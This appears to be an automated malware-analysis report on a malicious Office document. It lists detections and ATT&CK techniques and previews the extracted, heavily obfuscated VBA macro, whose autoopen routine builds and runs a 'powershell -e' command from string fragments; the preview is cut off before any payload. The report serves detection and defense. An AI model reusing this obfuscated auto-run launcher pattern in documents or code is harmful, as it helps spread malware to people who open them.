MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and uses a GetObject call, indicating an attempt to execute code. The ClamAV detection 'Doc.Malware.Droo-6903134-0' further confirms its malicious nature. The VBA script is heavily obfuscated, making it difficult to determine the exact payload, but its presence strongly suggests an attempt to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Malware.Droo-6903134-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Droo-6903134-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 56227 bytes |
SHA-256: 977cee63909df0bd89d294e3549492f8477358fa7dc41ba5e83c0cc045c2835a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tkcoCQB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function s1ZUAZ()
If QXAAAk = d1UUZGG Then
PA_wAD = 113310848 * iACGxU
wGk1xX = i1GAUAxU / 266036998 / 780124235 + 562977434 * 7914962 / 847506671 + (kXQ_ZQoA - Tan(OAcxo1 + 605578611 - 467014396 - Oct(EA1ABwwA - Hex(249475745) + 844378493 + Oct(365272388))) + (381248980 / Sqr(17677404)))
EwA_wUx = 373947791 * DxGUZCQ
End If
If KADZcQA = d4cBXo Then
uQAAwwA = 111163196 * oAACAA
EAA1_A = qAAZAAA / 191966422 / 585351310 + 425436490 * 828541278 / 213059773 + (IUZAkA1A - Tan(zCAAQBAB + 315546895 - 827630960 - Oct(kcAcUUD_ - Hex(212234006) + 681109503 + Oct(258279385))) + (393750373 / Sqr(263095872)))
HxAkXQ_Q = 845345808 * WxDAAA1Z
End If
If iAxABC = V4Q_kU Then
AQBUA1_D = 74208668 * RXCUAxx
AZUAcDBA = jXUD_c4c / 591323130 / 361609455 + 858908795 * 681825759 / 562495997 + (Yc_XAAk - Tan(oZDxUD + 446740246 - 222623987 - Oct(hDCD_A - Hex(742385990) + 48265074 + Oct(410231027))) + (682724074 / Sqr(48578684)))
EAZUUAUA = 509623743 * QC4BBQA
End If
If EBBXAXkx = PAZAkcA Then
GBBDAxAw = 147687551 * WkGBQUU
vBcACZAA = DZAAADA / 480953450 / 242554964 + 161362378 * 882338055 / 964671034 + (bxXDAZA4 - Tan(zBBAAAk1 + 400021814 - 525539996 - Oct(NGAZQA - Hex(164580386) + 683957846 + Oct(800657767))) + (947657366 / Sqr(581195208)))
wAQxDo_A = 221291665 * nAAAA4B
End If
If ICGwDUB = VABBAQxZ Then
nQAoAA = 393366826 * QZ_DAAA
uA_1kkA = OA4oBc / 200783572 / 330518127 + 771895554 * 829846440 / 53456877 + (zcUQ1C - Tan(dDQB4QA_ + 658028736 - 208998653 - Oct(qkQAAC - Hex(459867681) + 145418888 + Oct(472798286))) + (496762903 / Sqr(982621908)))
qBZoDBoA = 552077676 * qACw_ok
End If
If qAQAcZ = MDADUGA Then
KCc1AB = 840129224 * lQxZAA
dDXUB_ = oADcQcGk / 387014576 / 980086202 + 346116226 * 207352287 / 12310465 + (wDcQXQA - Tan(dUkAUZA + 493587671 - 686607011 - Oct(kA__AkA - Hex(107873806) + 813767245 + Oct(576825001))) + (298802501 / Sqr(300558943)))
MD4UDXxB = 744452207 * sxUADB
End If
If QAUAwG1C = cDxUAAGB Then
wAxQU_ = 824260369 * tAZwZ_G_
TUAAZAwD = uBwAxAZw / 858059403 / 875590836 + 768239316 * 856978656 / 159733552 + (bABQAccB - Tan(aAAZAX + 372210536 - 626644529 - Oct(BDAXQcA4 - Hex(230344455) + 65022417 + Oct(511261916))) + (548598393 / Sqr(98259149)))
iDBCAAAZ = 983582163 * WACUUwAA
End If
If wABAAx11 = zADcccQB Then
FAwZcA = 76041018 * EwGAAo
pkBkAQA = r4BBAk / 127883249 / 124147830 + 868789810 * 289112633 / 525893147 + (JABwBGAQ - Tan(C_AAAA + 843981742 - 101644624 - Oct(kQZAQG - Hex(89432407) + 534669831 + Oct(686141805))) + (883227102 / Sqr(588299302)))
DAABAC = 752229546 * a_QDGUww
End If
End Function
Sub autoopen()
On Error Resume Next
If YAoAXA = aBAAAU Then
C_AAQAZ = 153741829 * iDDcQA
iBXBDA = qDD14A / 281672194 / 129152302 + 974500169 * 826491732 / 593702330 + (CQUXCcAA - Tan(bZAACA_U + 722302278 - 191173025 - Oct(IQBAZAC - Hex(999401335) + 944559283 + Oct(326783304))) + (970880771 / Sqr(555644868)))
YUA_11 = 282215570 * oXDAcZAo
End If
If zQc4UAZA = fG_GAA Then
nUAA_DA = 825526443 * QBDAwQBA
iAXoBB = hADAUUDc / 835889826 / 130091923 + 313313953 * 883022069 / 457318193 + (qZGCAAG - Tan(nQAAwA + 261490904 - 594019978 - Oct(JA4xoUD - Hex(272615991) + 951292716 + Oct(428297665))) + (721890307 / Sqr(109613575)))
zDDoADwc = 152948901 * v_AAQoU
End If
ZDGCAXA (TA41_AD + "po" + KQoAGGDw + "wersh" + wAACAAUZ + "ell -e " + JAGAAAGG + XBxACBQ + jZ4AAC + OZXDZx_Q + RAX1AAA + PGGZo4 + RAUQDBU)
If aCCAAc = GAc4Zk Then
IAoA4B = 301061720 * CQDGwAA
hAA4GAA = FUcZw1 / 908857049 / 322748241 + 467095128 * 806190665 / 860382067 + (i1ABXkZ - Tan(iAA_UBQ + 6484553
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.